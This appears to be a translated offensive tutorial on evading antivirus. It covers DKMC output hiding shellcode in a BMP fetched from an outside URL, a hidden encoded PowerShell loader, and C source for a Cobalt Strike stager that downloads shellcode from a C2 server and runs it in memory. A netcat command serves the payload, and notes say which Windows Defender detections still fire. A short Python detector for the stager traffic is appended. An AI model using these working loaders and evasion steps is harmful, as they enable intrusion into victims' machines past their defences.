\xd3\xd0\xe3\x77\x37\x16\x5d\xcd\x64\x49\x7d\x46\xaa\xcd\xe3\xdb\xa3\x55\xf1\x3b\x45\xcb\xe9\x89\xfa\x09\x6a\xaf\x05\x45\xa5\x8f\x2d\xfb\x88\x0d\x4e\x8e\x59\xdc\xd6\x25\xd9\x6d\x68\xc8\xe6\x79\x14\x8f\x46\x0f\x12\x2e\xa9\xfc\x14\x21\x0e\xdc\x9a\x19\x14\xe7\xe3\xe6\xc7\x42\xa8\xf3\xf1\x8a\x40\xf6\xd2\x78\x5d\xb2\xe5\xaf\x12\x56\xc9\x40\x11\x74\x4b\xc2\x12\x7e\xd4\xde\x8d\x4a\x6f\xc5\x7c\x93\x7b\x4f\x98\xbc\x18\x78\xfa\x7d
\x92\x7c\x1c\x7d\x7f\xf8\x21\x79\xe0\xb8\xf9\x6a\x86\xe0\xcd\x09\xdc\xb5\xe9\xde\x52\x51\xcd\xfe\xbf\x19\xab\x76\x84\xc4\x42\x31\x76\x7b\x29\x7b\x2d\x34\x82\x1f\x0c\xa5\x1c\xa9\xcf\x54\x5a\x3b\x1a\xe2\xd5\x9a\x1e\xe2\x7b\xa3\x39\x64\xff\x78\xc2\x72\x88\x70\xc6\x06\xcd\xa8\xbc\x25\xfe\x56\x81\x75\x05\x8b\x8a\x6f\x16\xe2\xd6\x86\xdb\xf6\x1d\xa0\x31\x25\x55\x66\x25\x87\xa1\xb9\x96\x70\x87\x19\xcb\x69\xf6\x2f\xad\xaa\x4e\x86\x08\x40\xe3\xd8\xc4\x6f\x06\xa0\x01\x16\xfd\x26\x32\x2e\x99\xc2\x9a\xea\x11\x9a\x27\x9d\xea\x9a\x48\x60\x2a\x8a\x82\x3e\xe5\xcd\x93\x2c\x78\x01\x06\x29\x64\x5c\xda\x0c\xea\xd3\xca\xde\x84\xd1\xe1\xd9\x5b\xc3\xf2\x3c\x9a\x7d\x02\x65\xc9\x54\xe5\xbc\x46\x9b\x64\xe3\xd1\x94\x64\xf6\xcf\xf9\xec\x26\xec\xa2\x08\xfe\x2b\x6b\xe6\x87\xc2\xca\xed\x4e\xf0\x17\xf1\xc0\xa6\xea\x95\x1e\xd6\x2f\xce\x9a\x75\x8a\x4b\xb8\x2c\xa3\xec\x13\x68\x2f\xe3\x66\x06\x28\x6b\xdc\x91\x3f\xc7\xbe\x41\xd0\x95\x9a\xae\xd2\x8d\x9a\x9d\xa5\x76\x1d\x37\x69\x29\xa6\x43\x8e\xc8\xc0\xe8\x93\xc2\x51\xec\x62\x8e\x74\xbe\xfe\x2e\xc5\xf2\x4b\xd7\xb2\xdd\xc9\xd1\x07\x34\x05\x8d\x13\x24\x3f\x49\xee\xb0\x78\x5e
[+] shellcode value is set.

(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x345c8c05
[+] Shellcode size 0x300 (768) bytes
[+] Generating magic bytes 0x8402012f
[+] Final shellcode length is 0x353 (851) bytes
[+] New BMP header set to 0x424de9a8c30300
[+] New height is 0x0e010000 (270)
[+] Successfully save the image. (/root/DKMC/output/output-1599057844.bmp)

The image is generated; copy it out to the VPS, then exit back to the top-level prompt.

URL: http://www.lucifer11.xyz/evil11.bmp

ps

(powershell)>>> set url http://www.lucifer11.xyz/evil11.bmp
[+] url value is set.

(powershell)>>> run
[+] Powershell script:
powershell.exe -nop -w hidden -enc JABmAG0AcAB5AEYAUQBlAG4AegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBIADQAcwBJAEMARwBlAHoAVAAxADgAQwAvAHoARQAxAE8AVABrAHcATgBUAGcAMwBPAFQARQB1AE4ARABRACEAdABWAFoAdABUACsATQA0AEUAUAA2AE8AeABIACsAdwBWAHAARwBTAFMARwBrAG8AeQAzADAANABJAGEAMQBFAEsAYgBDAFUAbwA5ADEAZQB5ADgATAB1AGQAcQB1AFYAawAwAHgAYgBMADQANABkAGIASwBjAGwAdQAvAEQAZgBiADUAdwBYAFcAZwBUAGMAYwBuAGUANgBmAEkAbABmAFoAdQB5AFoANQB4AGsALwB0AHYAUABIAHMAcwBQAEkATwAzAEwAZwBiAG0ALwBOAGMAaABFAGIASgBnAFUAcABWAEoAYgBEAE4AZgBtADUAdgBVAFgAcQBiADAAZwBWAFQAWQBuAG4ATABLAG4ANgBsAHMAbwBrADUAeABDAFEAcwBwAE0AcABHAFUATwBTAEsALwBEAFgAeABrADUAeQBmAG4AWQB1AHgAUABJAFEAMQAvAFUAbQBuAFMAdwA3AGsAaQBsAGwAWQByAHEALwAzADgAMgBWACEAbQBHAHEAZgB2AGcAZQBUAEUAZAByAFMAQwBQAE8AUQBIAHMAKwB1AFMATgBYAEMAMQBEAFEAKwBoAEIAOQBoADkAaQBRAG4AOABUADUARgByADcAbgBNAHEASwA4AE4AaQB1ADYATgBGADQAIQBhAFgAVgBFAFkAdQBmAE8AWgBVAHgAdAB2AE8ARQA0ADQAOAB4ADQANwB0AGUAdgByAGoAOQBwADcAVQA3AEQANAA1AHUAYwBjAHUAMgA1ADQAMABJAGIAUwBNAE8ARQBjADkAYwBuADkANwA3AGQAOABLAEwASQB3AEgAUAA3AEwARgBaAFMAeQA1AGsASgByADUAagBZAGUAeAB0ACsARgBKAHIATwBZAEkAQwByAEwAYQBFAFAAWgBpAEUAVAA3AFcASgBDADYANQBRAFUAbQBGAHkASgBkAFcAWgAyAHEAYwByAFEAYwA3AEUANQBSAEIAUQA2AFMAYQBKACEAbwAxAC8AWQBFADAAdAA1AEQAWgA0AGoAYwBzADQARABjAHUAQgBOADYAagBoAEcAdQBUACEAcwBCAFoAdwAzAG8ARwBRADIAQgByAFYAawBNAGUAagB3AGwASQBxAEUAdwB3AGgAbQBVADIAOAAhAHEAeQBiADkAMQB6AHAANQBtADAANQBvAE4AVABUAEsARAA1AEMAcQBGADAATAB0AGwAKwB4AFYAMwBxADcALwBOAE4AZwBOAGkAbgAzADgAbgB0AEMATQBzAE4AeABiAFoAQgA2AEsANQBYAE4AKwBkAFQAWgA3AHAAbABiAFcAIQA4ADAAMwBLAFcAYwAhADgALwBDAEcAVQByAFAAUwArAHgAMQBwAEIANgBTAFAAMABWACEAagBWAFkARgBkADUAMABMAGwANABFAC8ASgB4AEQASQAxAG0AVQA2AEoAdwAwACsASwA2AHoAKwBqADYARQB2AHcAMgBoAFYAMwBHADMAZAAwAGoAdQAhAHoAWABNAGgATQA0AGYARABrAFUAcgBKAGsAdQBsADcAawBFAGMASABPAFkAYgBHAHkATgBpADkAWAA2AHgASABNAG0ASQBDAGoAUQB0AEMAVQB4AFUAMQBCAGUAcwA4AHgAQgBqAE0ATwBKAFQAWgBoAFkAegBiACEASQBEADIAMwBuAG8ARABrAEMARABqA
E0AcQBiAEgANABCADIAVAB5ADEATwAwADQAWgBlAGIAQgA5AHoAQgBuAFAAIQBIAFYAaQBaAEYAMQBqAFYARgBoAFEAZgBpAFAAZwA2AGsAbwA5AGQAeQBlADYARQBPAEsASwBGAFoAOQBGADYAbQBiADQAVABHACEAeAByAG8AdQAvAGEATABaADMAZgBiAFIAeQBPADEAeQBxAG4AVgAhAGgAagBtAGUAdwB6AGcAZwBZADYAIQBjAGsAbwBCADAAaABHAGIAMQBWAEMAYwAzAHMAbQB5ADYANgAzAEQANwBPAFQAYwBzAHAAdABvADAAeQAwADMAOQB4ADIAagBXAHUAMwBhAGwAMABFAGIAbABNAGQASwBMAEMARgB5AE0ATQA0AGcAWgA1AFIAYQBRAGcASgB5AHkAQgAhADYATABNAFoAcwAzAHUANwB2AFAAdwB0AEcAbABuAEQATQB4AHgANQBXAFcAUwAhAGUATwBXAEIAagBHAHgAaABhAE4AdwBrACEAZgBDAHMAUQBQAHgAMgBCADYAYQBjAFkAaABSAGIAdABTAEcAawA0ADQAbgBhAE0AUQAxAEkAZQBvAHIARABRADYAaAA4AFIAOQBQAHQAYgBtAG0ARgBSAG4AdwBtAEwAVABnAEwASQBSAEsAUgBJACsANQB0AEkARQA1AEoASQBwAGcAegBwAGoAYwBXADYAcQA3AEQAOABIADAAKwBpAE0AagBhAG0AcgBvAEcAYgBKAHEAdwA1AGQAIQA4ADAAIQBVAEwAYwBnAEcAcwBGAE4ARAB0AG8AZwBGAGgAZwA5AFIAVABwAHcARABJAFgAbwB0AHIAQwBlAGkAVQBVAEsAMgBiAGMAMQB2AGUARwAyAG4AaQBtAGwAZABPADIANwA0AFkASQBiAEgAUgBiAEcAbgBqADIAbgAwAE4ARwB5AGwAeAA1AGYAVwBpAEYALwBXAHUAaAAxAEgARgAyAFUAYgAyAEcAdwB5AHUAUgBLAGMARQBtAFQASQAyAHEAbwA5ADIAWgBoAFQATABhAC8AcwA3AE4AYQByAFUASwBlAHgAMgB3AEcAYQBuAGMAMwB2AEMAMQArADcATQBDAFMAYwBXAHgARwBhAGYAYQBtAFAASQBIAE8ANABHAFIAMABNAFYASQBiAGcAYgA0AGsAZQBYADIAcQA5AEkASgB5AEQAQgBwADEAcgBDAG0ANwBFADYAbABPAGEAaQBrAGEAUwBtAFkAOQBQAEsAKwArAHYANgA1AEIAQwBlACEAbwA3ADMAZwBCAE4ARwB4ADEATwBKAGUAeAAxAGMAZABLAHQAbABDAGMASwA4AG0AYwBZAHUAVgA5AHgATwBiAGUAMgAyAGQAYgBQAG4AawB3ADkATgBlAGkAMgBRAHoAdAA3ADMALwBCAFEASgBIADgAQgBxAC8AdwBIAE0AVABjAEwASQBMADIANwBWADYANwBqAFEATABYAHYAdgAyAHQANwBhADgASgAvAEgAVwBDAFgAWgBrAFYAMwBzAE4AeQBnAFIAWABKAEcAcQBmAE4AWABYAGkANQBTADQAVwBpAFkAUgBIADgAMwB4AGoAVwBGAGIAbgAhAFgALwBKAEwARABOAGQAagBmAHoAUAA3AEsAbAB6AGIAUQBaAFAANwBrADQAbgBIACEALwA4AEkANABuACsAUgAvAHgAVgBsAEIAbQAzAEgASwBFAFkAYwBxAHIAUAB3ACEAZwB4ADEAMQBXAHoAYwByADUAWQBmAHIASQBkAFoALwBkAG4AWAB6AG8AZgBjAHQAIQBaADQANwBXADUAdgB1AFEAZQBXAHcAOQA2AE0AYgBLAFMAdQAyAFEAOQA4ADYAcwAhAE4AKwBkADMAZgB2AEYAMgAxAG8AYwBxADAAdgBzAHMASQAzADAAZQBaAHYAZgAwADgANQAvAFQAVAA4AHMAWQBjAG4ALwBtAGsAZAAvAHkASgBOA
EQAMQB5AFQAMQBvAEkAUQBrAGYAdgB2AGMAVQBIAGsANQByAG4AVgBvAGEASQBVAHoANwAzADcAcwBnAEsATQB5AGsAWAB1AFMATQBqAGkAIQBHAGYAUABhADAAegBHAFoAVQBxACEAMwBoAGwAYgBHADUAWQBMAG0AcgBkAHkAdABtAC8AIQBIAGcAIQBoAHAAMAB3AEMAZwAhACEAIgAuAFIAZQBwAGwAYQBjAGUAKAAiACEAIgAsACAAIgBBACIAKQApACkAOwAgACQAdQBSAEQAcQBVAG8AIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAZgBtAHAAeQBGAFEAZQBuAHoALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwAgAFsAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAF0AOgA6AEMAcgBlAGEAdABlACgAJAB1AFIARABxAFUAbwApAC4ASQBuAHYAbwBrAGUAKAApAAoA

Then set up the msf listener and run the PowerShell one-liner on the victim.

Huorong blocked the script when it ran, but the BMP file itself gets past most AV.

The shell could not reach the external msf? Only usable inside the LAN?

Python-Rootkit

Needs a specific msf version plus 32-bit Python and py2exe; cumbersome.

Beacon: getting past Windows Defender

Write a small stager that does nothing but allocate memory, download the payload and execute it. The stager contains no malicious code of its own, so it gets past Windows Defender's static scan of the file on disk; the payload still lands in memory in the clear at run time, so this says nothing about behavioural or memory scanning.

1. Write the stager

The stager is a TCP client: it connects to our C2 server, downloads the payload, allocates memory and executes it. Code below (Visual Studio 2010, statically linked so the exe has no runtime DLL dependency on the target).
Static linking settings:

(1) Project -> Configuration Properties -> General -> Use of MFC: Use MFC in a Static Library.
(2) Project -> Configuration Properties -> C/C++ -> Code Generation -> Runtime Library: Multi-threaded (/MT).

// Visual Studio projects with precompiled headers need #include "stdafx.h" first
#include <WinSock2.h>
#include <WS2tcpip.h>
#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib, "ws2_32.lib")
// GUI subsystem with the console entry point: no console window is shown, so the
// printf() calls below are only visible when built as a console app for debugging
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )

// Upper bound for the downloaded payload; a stageless Beacon is a few hundred KB
#define MAX_PAYLOAD (4 * 1024 * 1024)

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);

    if (argc != 3) {
        fprintf(stderr, "usage: stager.exe hostname port\n");
        exit(0);
    }
    struct hostent *host;
    if ((host = gethostbyname(argv[1])) == NULL) { /* resolve the C2 host (name or dotted IP) */
        puts("Get IP address error!");
        exit(0);
    }

    int port = atoi(argv[2]);                 /* atoi() returns 0 on garbage, not NULL */
    if (port <= 0 || port > 65535) {
        puts("Get port error!");
        exit(0);
    }

    SOCKET sclient = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sclient == INVALID_SOCKET)
    {
        printf("invalid socket !");
        return 0;
    }

    sockaddr_in serAddr;
    serAddr.sin_family = AF_INET;
    serAddr.sin_port = htons((u_short)port);
    serAddr.sin_addr = *((struct in_addr *)host->h_addr);

    if (connect(sclient, (sockaddr *)&serAddr, sizeof(serAddr)) == SOCKET_ERROR)
    {
        printf("connect error !");
        closesocket(sclient);
        return 0;
    }

    // Allocate the RWX region first and receive straight into it. A single recv()
    // into a 1024-byte buffer only works for payloads under 1 KB; Beacon stagers and
    // stageless Beacons are larger, so keep reading until the server closes the
    // connection or goes quiet for two seconds (a plain `nc -l` does not always close).
    char *shellcode = (char *)VirtualAlloc(NULL, MAX_PAYLOAD, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (shellcode == NULL)
    {
        closesocket(sclient);
        WSACleanup();
        return 0;
    }
    printf("Allocated memory for shellcode at:%p\n", shellcode);

    DWORD recvTimeoutMs = 2000;
    setsockopt(sclient, SOL_SOCKET, SO_RCVTIMEO, (const char *)&recvTimeoutMs, sizeof(recvTimeoutMs));

    int total = 0;
    int n;
    while (total < MAX_PAYLOAD &&
           (n = recv(sclient, shellcode + total, MAX_PAYLOAD - total, 0)) > 0)
    {
        total += n;
    }
    printf("received:%d\n", total);

    if (total > 0)
    {
        printf("Shellcode in place at:%p, sending back the session...\n", shellcode);
        ((void(*)()) shellcode)();   /* jump into the payload on this thread; normally never returns */
    }
    closesocket(sclient);
    WSACleanup();
    return 0;
}

Once the stager is built, upload it to the target machine and run it, e.g. stager.exe c2_hostname port

stager.exe www.xxxxxx.com 53    // using a hostname
stager.exe 8.8.x.x 8080         // using an IP address

(2). Generate the CS payload and start a TCP server on the C2 server
Generate the payload with CS

Start a TCP server on the C2 server; for convenience, just use netcat

echo -e "\xfc\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\x00\x00\x00\x00\x00" | nc -l -p 53 -vvv

(3). Target checks in
After the stager runs on the target machine, it downloads the payload from the C2 server and executes it, and the target checks in. Note that although Windows Defender's static scan is bypassed, Defender's behavioural detection still needs care: for example, escalating privileges from the beacon session and invoking mimikatz are both detected by Defender, while functions such as dumping hashes and the proxy server run normally.
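From the defender's side, the delivery above has a visible network shape: the netcat server pushes a raw shellcode blob on port 53 (or 8080) before the client has sent anything, and the blob is not DNS or HTTP. The following is an added example, not code from the original post, of how a network sensor can classify the first server-to-client message of a new TCP connection; the prologue bytes are the well-known Metasploit/Cobalt Strike stager start, and the sample messages are constructed placeholders, not captures.

```python
import struct
from dataclasses import dataclass, field

# Well-known leading bytes of Metasploit / Cobalt Strike stager shellcode:
# x86 "cld; call ..." and x64 "cld; and rsp, -0x10".
SHELLCODE_PROLOGUES = (b"\xfc\xe8", b"\xfc\x48\x83\xe4\xf0")

@dataclass
class Verdict:
    suspicious: bool
    reasons: list = field(default_factory=list)

def looks_like_dns_over_tcp(msg: bytes) -> bool:
    """RFC 1035 TCP framing: 2-byte big-endian length prefix, then a 12-byte header."""
    if len(msg) < 14:
        return False
    (length,) = struct.unpack("!H", msg[:2])
    return length == len(msg) - 2

def printable_ratio(data: bytes) -> float:
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data) if data else 0.0

def classify_first_server_message(dst_port: int, msg: bytes, client_spoke_first: bool) -> Verdict:
    """Classify the first bytes a server sends on a new TCP connection to dst_port."""
    reasons = []
    if msg.startswith(SHELLCODE_PROLOGUES):
        reasons.append("starts with a known stager shellcode prologue")
    if dst_port == 53 and not looks_like_dns_over_tcp(msg):
        reasons.append("port 53 but not DNS-over-TCP framed")
    if dst_port in (80, 8080) and not msg.startswith(b"HTTP/"):
        reasons.append("HTTP port but the server did not answer with HTTP")
    if not client_spoke_first and msg and printable_ratio(msg) < 0.3:
        reasons.append("server pushed an opaque binary blob before any client request")
    return Verdict(bool(reasons), reasons)

# Constructed sample messages (not real captures): a minimal DNS-over-TCP reply
# and a placeholder "push" that only carries the x64 prologue plus filler bytes.
DNS_REPLY = struct.pack("!H", 29) + b"\x12\x34\x81\x80\x00\x01\x00\x00\x00\x00\x00\x00" + b"\x07example\x03com\x00\x00\x01\x00\x01"
FAKE_PUSH = b"\xfc\x48\x83\xe4\xf0" + bytes(range(0x80, 0xa0))

SAMPLES = {
    "dns-over-tcp reply on 53": (53, DNS_REPLY, True),
    "nc shellcode push on 53": (53, FAKE_PUSH, False),
    "nc shellcode push on 8080": (8080, FAKE_PUSH, False),
}

def run_samples() -> dict:
    return {name: classify_first_server_message(*args) for name, args in SAMPLES.items()}

if __name__ == "__main__":
    for name, v in run_samples().items():
        print(f"{name}: {'SUSPICIOUS' if v.suspicious else 'ok'} {v.reasons}")
```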

VirusTotal online malware scanning

https://www.virustotal.com/